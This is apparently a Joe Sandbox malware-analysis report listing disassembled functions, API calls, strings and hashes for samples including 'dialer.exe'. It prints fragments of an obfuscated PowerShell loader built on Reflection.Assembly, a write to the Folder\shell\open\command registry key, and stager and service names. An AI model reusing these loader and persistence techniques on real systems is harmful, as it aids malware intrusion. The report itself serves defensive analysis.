SetLastError.KERNEL32(00000000), ref: 00F21364
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 00F2137D
RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 00F21388
SetLastError.KERNEL32(00000000,?,00000000,00000001,?,00000000), ref: 00F21393

Strings

Software\Classes\Folder\shell\open\command, xrefs: 00F2134F

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: ErrorLast$CloseOpenValuelstrlen
String ID: Software\Classes\Folder\shell\open\command
API String ID: 1150107030-2536721355
Opcode ID: 673c607944999bf9c5dd885415f9fae048ef69cea608aad038448338b9692377
Instruction ID: 2c1abc8d6e688578aa646ffc56d2ed035dc08bf51cf4821ec0ed63ec25a9b2ef
Opcode Fuzzy Hash: 673c607944999bf9c5dd885415f9fae048ef69cea608aad038448338b9692377
Instruction Fuzzy Hash: E101D632A5122CBBDB309BA6BC49FEBB7ACEB45731F1001B6F908E211196624D0675F4

Uniqueness

Uniqueness Score: -1.00%

Function 00F23130 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 00F23167
___except_validate_context_record.LIBVCRUNTIME ref: 00F2316F
_ValidateLocalCookies.LIBCMT ref: 00F231F8
__IsNonwritableInCurrentImage.LIBCMT ref: 00F23223
_ValidateLocalCookies.LIBCMT ref: 00F23278

Strings

csm, xrefs: 00F2320D

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: deefbc39d289e01e1cbe1fb3dec27ef8f9007e55f65072ba66528f4254dc04d3
Instruction ID: 6166072dd0b539586a64659159f96403186360678ec2a71f09b1b2f4c9fe50f2
Opcode Fuzzy Hash: deefbc39d289e01e1cbe1fb3dec27ef8f9007e55f65072ba66528f4254dc04d3
Instruction Fuzzy Hash: 2641D274E00228DBCF10DF68EC45A9EBBB5AF45324F148065E814AB392C739AA15EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F28D18 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,9DE3E2FD,?,00F28E25,?,?,?,00000000), ref: 00F28DD9

Strings

ext-ms-, xrefs: 00F28D83
api-ms-, xrefs: 00F28D6F

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: da98b0947b3ae1e3f7fc8becc1ca058787627d13ef5fdfa54a48f836313b74c5
Instruction ID: 8a6b7c69406d678c436000027c04ccce2052ce142e6340064b33fe53556fc649
Opcode Fuzzy Hash: da98b0947b3ae1e3f7fc8becc1ca058787627d13ef5fdfa54a48f836313b74c5
Instruction Fuzzy Hash: CD219376A02239ABCB319B64FC40A5A37699F617F0B640124F906A72D1DF30ED0AF6D0

Uniqueness

Uniqueness Score: -1.00%

Function 00F23644 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00F2363B,00F234AC,00F22979), ref: 00F23652
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F23660
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F23679
SetLastError.KERNEL32(00000000,00F2363B,00F234AC,00F22979), ref: 00F236CB

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: f0339768b2b4a7b352d519d09100227a3f08a7b35e3b3624a9518b2266850a02
Instruction ID: 4d2b8763255e0ee597e121fc6c497e877cb769d2da9478eb793613eb3d641119
Opcode Fuzzy Hash: f0339768b2b4a7b352d519d09100227a3f08a7b35e3b3624a9518b2266850a02
Instruction Fuzzy Hash: B80124B3A193357EE62866B4BC86E663E99EB04B787200239F411D43F2EF994C017144

Uniqueness

Uniqueness Score: -1.00%

Function 00F24722 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00F247E3,?,?,00F36C78,00000000,?,00F2490E,00000004,InitializeCriticalSectionEx,00F2FCA4,InitializeCriticalSectionEx,00000000), ref: 00F247B2

Strings

api-ms-, xrefs: 00F24772

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 31c7d78455f9fc1f651d51543e5278c1d775b30a67d7d2364d7f8556d73fc84b
Instruction ID: b88b1940f0fe866b4e9042cf05cdfe367cd64a63969a2cec2b6546f2193aab18
Opcode Fuzzy Hash: 31c7d78455f9fc1f651d51543e5278c1d775b30a67d7d2364d7f8556d73fc84b
Instruction Fuzzy Hash: E7118236E51235ABDB329B68BC44B5937A4AF02B70F250530F925EB2C0D7A0FD05A6E5

Uniqueness

Uniqueness Score: -1.00%

Function 00F25A72 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9DE3E2FD,?,?,00000000,00F2DF3C,000000FF,?,00F25A45,00F25B32,?,00F25A19,00000000), ref: 00F25AA7
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F25AB9
FreeLibrary.KERNEL32(00000000,?,?,00000000,00F2DF3C,000000FF,?,00F25A45,00F25B32,?,00F25A19,00000000), ref: 00F25ADB

Strings

mscoree.dll, xrefs: 00F25AA0
CorExitProcess, xrefs: 00F25AB1

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c2358345b4e94be48e9d4223a1e119e39f414a73e1b2585b1e42b64d59ad5281
Instruction ID: 80ab4608b923b54b95586ac78c877f9818a9a1fc57a1839ca65ceb9fd5f3c18b
Opcode Fuzzy Hash: c2358345b4e94be48e9d4223a1e119e39f414a73e1b2585b1e42b64d59ad5281
Instruction Fuzzy Hash: BF01A731910629EFDB11DB50DD06BAEB7B8FB04B20F404635F811E2690D7789805DA55

Uniqueness

Uniqueness Score: -1.00%

Function 00F2A9DC Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(9DE3E2FD,?,00000000,?), ref: 00F2AA3F

Part of subcall function 00F27EBD: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F2A6B5,?,00000000,-00000008), ref: 00F27F69

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F2AC9A
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F2ACE2
GetLastError.KERNEL32 ref: 00F2AD85

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 1fd9d71a27443dcb9f7c6e0a6424bc7d01c3f6018b6ae76c939ae98a9affa713
Instruction ID: eff920fb0f33b05a8b7e9aa330c1474a262f892e0a9c6dc9c41e1500e65e2a66
Opcode Fuzzy Hash: 1fd9d71a27443dcb9f7c6e0a6424bc7d01c3f6018b6ae76c939ae98a9affa713
Instruction Fuzzy Hash: 81D18AB5D042689FCF15CFA8E880AADBBB5FF08310F18416AE856E7351D730A842DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00F23724 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00F237EB
___AdjustPointer.LIBCMT ref: 00F2380E
___AdjustPointer.LIBCMT ref: 00F238AA

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 2dbfd1b0d5c8a759a3a6a66ca4cda8b1658b00f1d898a7689147513a19025c65
Instruction ID: 159f9c1e5c06eedf39179ba56eec0ec11c5d38e21fd6299c7b8216a545db03e7
Opcode Fuzzy Hash: 2dbfd1b0d5c8a759a3a6a66ca4cda8b1658b00f1d898a7689147513a19025c65
Instruction Fuzzy Hash: E051B0F3A04226AFDB299F54F841BAA77A5EF00320F14412DF9019A691D73DEE40FB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F2C196 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00F2B956,?,00000001,?,?,?,00F2ADD9,?,?,00000000), ref: 00F2C1AD
GetLastError.KERNEL32(?,00F2B956,?,00000001,?,?,?,00F2ADD9,?,?,00000000,?,?,?,00F2B360,?), ref: 00F2C1B9

Part of subcall function 00F2C17F: CloseHandle.KERNEL32(FFFFFFFE,00F2C1C9,?,00F2B956,?,00000001,?,?,?,00F2ADD9,?,?,00000000,?,?), ref: 00F2C18F

___initconout.LIBCMT ref: 00F2C1C9

Part of subcall function 00F2C141: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F2C170,00F2B943,?,?,00F2ADD9,?,?,00000000,?), ref: 00F2C154

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00F2B956,?,00000001,?,?,?,00F2ADD9,?,?,00000000,?), ref: 00F2C1DE

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 14901980c07d1c2328825aab0f1663de901126341311a1cd21e70994bcfb1088
Instruction ID: e135ed940ece2d8ab20f004356dc5c78b1b3154ad47a5e9bbe64782aa5dcd908
Opcode Fuzzy Hash: 14901980c07d1c2328825aab0f1663de901126341311a1cd21e70994bcfb1088
Instruction Fuzzy Hash: D9F0983691012CBBCF226F96AC0599E3EA6EB097B1B044020FA19D5122D6328964BB95

Uniqueness

Uniqueness Score: -1.00%

Function 00F23D25 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00F23D4A

Strings

RCC, xrefs: 00F23D64
MOC, xrefs: 00F23D5C

Memory Dump Source

Source File: 00000034.00000002.626858904.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000034.00000002.626400558.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627520930.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.627564928.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000034.00000002.628199228.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_f20000_MfU3390p.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 4d5f7147a02dbdd42a85b8aa0ba614b1eef041dd394806120355038fd6a7e507
Instruction ID: 0ff582ef6a7d62e41a0082d181f0674ac867d595dc00293058715feb92ab04dc
Opcode Fuzzy Hash: 4d5f7147a02dbdd42a85b8aa0ba614b1eef041dd394806120355038fd6a7e507
Instruction Fuzzy Hash: 7F419CB2D00259AFCF15DF94EC81AEEBBB5FF08310F198059F90567211D339AA55EB50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: NtjHIfvQ.exePID: 4744, Parent PID: 1088COMMON

Executed Functions

Function 00007FF8163E0138 Relevance: 1.8, Strings: 1, Instructions: 537COMMON

Download Yara Rule

Strings

Ca_I, xrefs: 00007FF8163E0184

Memory Dump Source

Source File: 00000035.00000002.614263784.00007FF8163E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff8163e0000_NtjHIfvQ.jbxd

Similarity

API ID:
String ID: Ca_I
API String ID: 0-3553833335
Opcode ID: 151ccdaa2f6848386223794723c1d6b208568390cf19289df35686c45dd0d2be
Instruction ID: faaac975febb861dce7f87815fcbdbfd263ae92b96e0b6b568af40ce6ad2d543
Opcode Fuzzy Hash: 151ccdaa2f6848386223794723c1d6b208568390cf19289df35686c45dd0d2be
Instruction Fuzzy Hash: 55514932E0DE848FE7559B6C9805BA9BBE0FF56360F0802BBD089CB1D7DE249805C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8163E0188 Relevance: .5, Instructions: 508COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.614263784.00007FF8163E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff8163e0000_NtjHIfvQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6a528d75e2d1571859f81a7c324bad16e409aecf3df85312c967075981eea17
Instruction ID: b751c42300988b82c065409bc57dd608b2ea00cc218007b322db813c2a28ee2e
Opcode Fuzzy Hash: b6a528d75e2d1571859f81a7c324bad16e409aecf3df85312c967075981eea17
Instruction Fuzzy Hash: A1511932D0CE898FE755EB6C9449BA9BBE0FF66360F0401BAD049D71D7CE24A845C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8163E0478 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.614263784.00007FF8163E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff8163e0000_NtjHIfvQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e2c64044fbc53152fcec35b1e7c5a8a7d361763ec4440b2998a13d3830a5dc
Instruction ID: bbd9eb515c676885c26b0f4e65b00e8933c2c127d2ea416c67960c39b0789d4b
Opcode Fuzzy Hash: a2e2c64044fbc53152fcec35b1e7c5a8a7d361763ec4440b2998a13d3830a5dc
Instruction Fuzzy Hash: 6B41D332D18D498FE754EB68C44ABA9B7E0FF65350F04067AD04DD72D2CE24A845CB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: dialer.exePID: 3376, Parent PID: 3064COMMON

Executed Functions

Function 00007FF6CF741000 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 103
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6CF7439D0: GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6CF7439E4

FindResourceA.KERNEL32 ref: 00007FF6CF741032
SizeofResource.KERNEL32 ref: 00007FF6CF74104E
LoadResource.KERNEL32 ref: 00007FF6CF741063
LockResource.KERNEL32 ref: 00007FF6CF741075
RegOpenKeyExW.KERNELBASE ref: 00007FF6CF74109F
RegSetValueExW.KERNELBASE ref: 00007FF6CF7410C9
RegOpenKeyExW.KERNELBASE ref: 00007FF6CF7410F8
RegSetValueExW.KERNELBASE ref: 00007FF6CF741122
lstrcatW.KERNEL32 ref: 00007FF6CF741144
lstrcatW.KERNEL32 ref: 00007FF6CF74115E

Part of subcall function 00007FF6CF7414C0: CoInitialize.OLE32(?,?,?,?,?,?,00000000,00007FF6CF741170), ref: 00007FF6CF7414E0
Part of subcall function 00007FF6CF7414C0: CoCreateInstance.OLE32(?,?,?,?,?,?,00000000,00007FF6CF741170), ref: 00007FF6CF741516
Part of subcall function 00007FF6CF7414C0: CoUninitialize.OLE32(?,?,?,?,?,?,00000000,00007FF6CF741170), ref: 00007FF6CF74153F

Part of subcall function 00007FF6CF7411E0: CoInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6CF74120C
Part of subcall function 00007FF6CF7411E0: CoCreateInstance.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6CF741248

Part of subcall function 00007FF6CF7413E0: CoInitialize.OLE32(?,?,?,?,?,?,?,?,00000000,00007FF6CF7411C2), ref: 00007FF6CF741400
Part of subcall function 00007FF6CF7413E0: CoCreateInstance.OLE32(?,?,?,?,?,?,?,?,00000000,00007FF6CF7411C2), ref: 00007FF6CF74143A
Part of subcall function 00007FF6CF7413E0: CoUninitialize.OLE32(?,?,?,?,?,?,?,?,00000000,00007FF6CF7411C2), ref: 00007FF6CF74148D

Strings

.("{1}{0}" -f 'eT','S') ("6T"+"o") ([tYpE]("{2}{0}{4}{1}{3}" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe]("{3}{1}, xrefs: 00007FF6CF74113A, 00007FF6CF741154
SOFTWARE, xrefs: 00007FF6CF741081, 00007FF6CF7410EA
dialerstager, xrefs: 00007FF6CF7410BA, 00007FF6CF741113
dialersvc32, xrefs: 00007FF6CF741164, 00007FF6CF741177, 00007FF6CF741187
dialersvc64, xrefs: 00007FF6CF741193, 00007FF6CF7411A6, 00007FF6CF7411B6
C:\Windows\SysWOW64\WindowsPowerShell\v1.0, xrefs: 00007FF6CF741170
EXE, xrefs: 00007FF6CF741024

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: Resource$CreateInitializeInstance$OpenTimeUninitializeValuelstrcat$FileFindLoadLockSizeofSystem
String ID: .("{1}{0}" -f 'eT','S') ("6T"+"o") ([tYpE]("{2}{0}{4}{1}{3}" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe]("{3}{1}$C:\Windows\SysWOW64\WindowsPowerShell\v1.0$EXE$SOFTWARE$dialerstager$dialersvc32$dialersvc64
API String ID: 4200006545-1300307586
Opcode ID: 8fbbe8e9e796aac168fdcce298f318b5f1698d0cd3343aefbc87d08d06dc5944
Instruction ID: 4f791a8f5562df7a63c3e48b04d3bfe6218636d2343bbd90628ecb90ca7da4a7
Opcode Fuzzy Hash: 8fbbe8e9e796aac168fdcce298f318b5f1698d0cd3343aefbc87d08d06dc5944
Instruction Fuzzy Hash: D0415D29B28A4382EA51AF23F8502793B91FF84786F410435D8CEC36A5EF6CE105DB30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF7414C0 Relevance: 4.5, APIs: 3, Instructions: 43
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(?,?,?,?,?,?,00000000,00007FF6CF741170), ref: 00007FF6CF7414E0
CoCreateInstance.OLE32(?,?,?,?,?,?,00000000,00007FF6CF741170), ref: 00007FF6CF741516
CoUninitialize.OLE32(?,?,?,?,?,?,00000000,00007FF6CF741170), ref: 00007FF6CF74153F

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID:
API String ID: 948891078-0
Opcode ID: bedc96490f1eed5bd38690492f26d424fd60cbc114869c101ca6c534f2c8301e
Instruction ID: 06ccdf6588ff9f455a187c0fa07b5268acd0aa77294b28bc961984307528297a
Opcode Fuzzy Hash: bedc96490f1eed5bd38690492f26d424fd60cbc114869c101ca6c534f2c8301e
Instruction Fuzzy Hash: 03117336728B4182E7409F62F48016AB7A4FB88BC5B405036EACFC3B64CF7CD4488B60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF7416B4 Relevance: 3.0, APIs: 2, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 00007FF6CF7416BD
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CF7448F8

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
String ID:
API String ID: 59578552-0
Opcode ID: c518e66c6656a2defda1c0c47fea5325ff7094e03b2b0a8685eec0034636562b
Instruction ID: e310a6fbaec5140fc431460e9357d525611df062a9d7b013e13ba8bb438cccc4
Opcode Fuzzy Hash: c518e66c6656a2defda1c0c47fea5325ff7094e03b2b0a8685eec0034636562b
Instruction Fuzzy Hash: A7E0EC38E1D112C6E6293F773C470BC2B941F45322FA0023AE6ADC12C2CE5C64A27E72

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6CF7411E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6CF74120C
CoCreateInstance.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6CF741248
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6CF7413AD

Strings

".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe, xrefs: 00007FF6CF7412BE
powershell, xrefs: 00007FF6CF7412A2

Memory Dump Source

Source File: 00000037.00000002.492548657.00007FF6CF741000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CF740000, based on PE: true

Associated: 00000037.00000002.492518600.00007FF6CF740000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493117802.00007FF6CF757000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000037.00000002.493469429.00007FF6CF759000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ff6cf740000_dialer.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe$powershell
API String ID: 948891078-831386775
Opcode ID: 244091c49ed68055c0692faef3a2525c7c3348f3c51319ed44420de56821d5e1
Instruction ID: c787c220c0bdb12c572a0af72904064f66011bf65cea847b17dc1d8272ec81f2
